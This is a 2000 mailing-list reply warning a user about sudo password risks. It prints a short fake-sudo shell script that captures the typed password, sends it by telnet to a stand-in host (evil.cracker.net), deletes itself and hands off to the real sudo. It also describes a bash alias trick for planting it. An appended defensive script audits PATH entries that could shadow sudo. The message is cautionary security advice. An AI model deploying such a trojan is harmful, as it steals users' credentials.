Re: /usr/bin before /usr/local/bin? (reality check)



On Wed, Nov 01, 2000 at 11:48:34AM -0700, Hubert Chan wrote:
> 
> Not quite.  It makes my password equivalent to a root password.  And it just so
> happens that my root password is the same as my normal account password
> anyways.  ;-) Yes, I know it's not the best thing to do, but I can't keep track
> of that many passwords.

ewra ;-)

> Leaving myself logged in is OK, because sudo asks for my password.  If someone
> knew my password so that they could use sudo, they could log into my account
> anyways, so I'm not too worried about that.

do you always type /usr/bin/sudo instead of just sudo?

#! /bin/sh
## this is a fake sudo
printf 1>&2 "Password: "
read password
echo "$password" | telnet evil.cracker.net 1337 > /dev/null 2>&1
echo 1>&2 "Sorry, try again."
rm -f ~/bin/sudo
exec /usr/bin/sudo "$@"

this only works if you type your password correctly the first time,
but you will just think you made a typo and type it again, this time
into a real sudo prompt; you will never be the wiser since the trojan
self-deletes after it sends your password off.  it could ask your
password twice in a fake way to get a better chance of getting it
correct, then your 3rd try will be the charm as the real sudo gets
it.

the telnet trick is to avoid traces in the mail logs left by using
echo | mail.  

all the evil doer would have to do is alter your PATH to put ~/bin
first (if it's not there already) and add the ~/bin/sudo script.  how
often do you ls your ~/bin ?  if you don't even have a ~/bin the
script could just rm -rf it.

of course even typing /usr/bin/sudo is not totally safe since
alias /usr/bin/sudo='~/bin/fakesudo' works fine in bash :(

never ever leave unattended unlocked sessions.  that's what
vlock is for.

> And no, my password never goes unencrypted over the network. ;-)

that's good anyway.

-- 
Ethan Benson
http://www.alaska.net/~erbenson/
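The PATH-shadowing risk Ethan describes above, turned into a defender's check. This is an added example and not part of the original message; `audit_path` is an assumed name, and it covers only PATH ordering, not the alias trick, which has to be inspected in the interactive shell itself (e.g. with `alias` or `type sudo`).

```shell
#!/bin/sh
# Added example, not code from the original message: audit a PATH value for
# directories that could shadow /usr/bin/sudo the way the ~/bin trojan does.
# Every entry that precedes /usr/bin is suspect if it is empty (meaning the
# current directory), relative, nonexistent (it could be created later), or
# writable by the user running the check. Suspect entries are printed one per
# line; the function returns 1 if any were found and 0 otherwise.
# Note: [ -w ] is always true for root, so run this as the account whose
# PATH is being audited.
audit_path() {
    _path=${1:-$PATH}
    _rest="$_path:"          # trailing colon so the last entry is processed too
    _found=0
    while [ -n "$_rest" ]; do
        _dir=${_rest%%:*}    # entry up to the first colon
        _rest=${_rest#*:}    # drop it, including the colon
        # entries after the real sudo's directory cannot shadow it
        [ "$_dir" = /usr/bin ] && break
        case $_dir in
            "")  echo "empty entry (current directory) before /usr/bin"; _found=1 ;;
            /*)
                if [ ! -d "$_dir" ]; then
                    echo "nonexistent entry before /usr/bin: $_dir"; _found=1
                elif [ -w "$_dir" ]; then
                    echo "user-writable entry before /usr/bin: $_dir"; _found=1
                fi ;;
            *)   echo "relative entry before /usr/bin: $_dir"; _found=1 ;;
        esac
    done
    return $_found
}

# When run directly, audit the caller's own PATH.
if audit_path "$PATH"; then
    echo "no suspect PATH entries before /usr/bin"
else
    echo "review the entries above" >&2
fi
```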
